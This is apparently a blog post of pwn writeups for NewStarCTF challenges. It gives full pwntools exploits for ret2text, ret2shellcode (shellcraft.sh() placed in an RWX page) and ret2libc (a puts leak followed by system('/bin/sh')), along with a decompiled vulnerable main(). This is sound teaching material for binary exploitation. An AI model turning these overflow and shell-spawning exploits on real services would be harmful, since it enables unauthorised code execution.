NewStarCTF公开赛赛道 Pwn Writeups

ret2text

检查文件

$ checksec pwn
[*] '/home/zhailin/365-Days-Get-ISCAS-Internship/week1/[NewStarCTF 公开赛赛道]/ret2text/pwn'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        No PIE (0x400000)
    Stripped:   No

IDA中找到后门函数

图1展示在IDA中找到后门函数

计算偏移量

图2展示在GDB中通过调试计算偏移量

Exp

"""ret2text exploit: overflow the stack buffer and return into the backdoor function."""
from pwn import *

# Local debugging alternative: io = process('pwn')
io = remote('host', port)  # 'host' / port are placeholders for the challenge endpoint

# Address of the backdoor function located in IDA; it is fixed because the
# binary has no PIE (see the checksec output above).
BACKDOOR = 0x0400708

# Distance from the buffer to the saved return address was measured in GDB:
# 40 filler bytes, then the 8-byte little-endian backdoor pointer.
padding = b'a' * 40
payload = padding + p64(BACKDOOR)

io.sendline(payload)
io.interactive()

ret2shellcode

/*
 * IDA decompilation of main() from the ret2shellcode binary, kept verbatim.
 *
 * Two properties make this exploitable:
 *  - mmap() maps a fixed 0x1000-byte page at 0x233000 with prot 7
 *    (PROT_READ | PROT_WRITE | PROT_EXEC) and flags 34 (0x22 =
 *    MAP_PRIVATE | MAP_ANONYMOUS), so the first read() places caller-
 *    supplied bytes in an executable page at a known address, which
 *    sidesteps NX.
 *  - v4 holds 40 bytes but the second read() accepts up to 0x100 bytes,
 *    a plain stack buffer overflow with no canary (see checksec).
 *    v4 sits at rbp-0x30; 0x30 bytes reach the saved rbp and 8 more reach
 *    the saved return address, hence the 0x38 offset used in the exploit.
 *
 * Mitigation side: bounding both reads to the destination size
 * (sizeof(v4) for the stack buffer) and not requesting an executable,
 * fixed-address mapping would close both issues.
 */
int __fastcall main(int argc, const char **argv, const char **envp)
{
  char v4[40]; // [rsp+0h] [rbp-30h] BYREF
  void *buf; // [rsp+28h] [rbp-8h]

  init(argc, argv, envp);
  // Fixed-address RWX anonymous mapping: the shellcode staging area.
  buf = mmap((void *)0x233000, 0x1000uLL, 7, 34, -1, 0LL);
  puts("Hello my friend.Any gift for me?");
  // First input lands directly in the executable page.
  read(0, buf, 0x100uLL);
  puts("Anything else?");
  // Second input overflows the 40-byte stack buffer (0x100 > sizeof(v4)).
  read(0, v4, 0x100uLL);
  puts("Ok.See you!");
  return 0;
}

图3展示在GDB中通过调试确定偏移量

接下来找到一片可读、可写、可执行的内存区域

图3展示在GDB中通过调试找到可用的可读、可写、可执行的内存区域

Exp

"""ret2shellcode exploit: stage shellcode in the RWX mmap page, then return into it."""
from pwn import *

# arch must be amd64 so shellcraft/asm emit 64-bit code; debug logging
# prints every byte exchanged with the service.
context(log_level='debug', arch='amd64', os='linux')

# Shellcode is assembled up front so an assembler error shows before connecting.
shellcode = asm(shellcraft.sh())

RWX_PAGE = 0x233000   # fixed address of the mmap(..., 7, 34, ...) page in main()
RET_OFFSET = 0x38     # v4 is at rbp-0x30, plus 8 bytes of saved rbp

io = remote('host', port)  # 'host' / port are placeholders for the challenge endpoint

# First read() writes into the RWX page: deliver the shellcode there.
io.recvuntil('me?')
io.sendline(shellcode)

# Second read() overflows v4 on the stack: point the return address at the page.
io.recvuntil('else?')
io.sendline(b'a' * RET_OFFSET + p64(RWX_PAGE))

io.interactive()

ret2libc

先找到 gadget，然后用老方法确定地址，并注意 x64 栈对齐。

Exp

"""ret2libc exploit: leak puts' runtime address through puts@plt, then call system("/bin/sh")."""
from pwn import *
from LibcSearcher import *  # kept from the original; not referenced below, the shipped libc-2.31.so is used instead

context(arch='amd64', os='linux', log_level='debug')

io = remote('host', port)  # 'host' / port are placeholders for the challenge endpoint
elf = ELF('./pwn')

# Static addresses: the binary has no PIE, so PLT/GOT entries and the
# gadget addresses below are fixed.
PUTS_PLT = elf.plt['puts']
PUTS_GOT = elf.got['puts']
MAIN = 0x0400698
POP_RDI = 0x400753   # pop rdi gadget (name taken from the original script)
RET = 0x40050e       # ret gadget, inserted for x64 stack alignment before system()
PADDING = b'a' * 40  # distance from the buffer to the saved return address

# Stage 1: puts(puts@got) prints the runtime address of puts, then re-enter
# main so a second payload can be sent.
stage1 = PADDING + p64(POP_RDI) + p64(PUTS_GOT) + p64(PUTS_PLT) + p64(MAIN)
io.sendlineafter('Glad to meet you again!What u bring to me this time?', stage1)

# Read up to the 0x7f byte that terminates the 6 significant bytes of the
# leaked pointer, then zero-extend it to a full 8-byte word.
leaked = io.recvuntil('\x7f')[-6:].ljust(8, b'\x00')
puts_addr = u64(leaked)
print(hex(puts_addr))

# Resolve system and the "/bin/sh" string relative to the leaked puts.
libc = ELF('./libc-2.31.so')
libc_base = puts_addr - libc.symbols['puts']
system_addr = libc_base + libc.symbols['system']
bin_sh_addr = libc_base + next(libc.search('/bin/sh'))

# Stage 2: system("/bin/sh"); the extra ret keeps rsp 16-byte aligned.
stage2 = PADDING + p64(POP_RDI) + p64(bin_sh_addr) + p64(RET) + p64(system_addr)
io.sendline(stage2)
io.interactive()

NewStarCTF公开赛赛道 Pwn Writeups
https://zer0ptr.github.io/2025/10/07/NewStar-CTF-public-wps/
Author
hakmaple
Posted on
October 7, 2025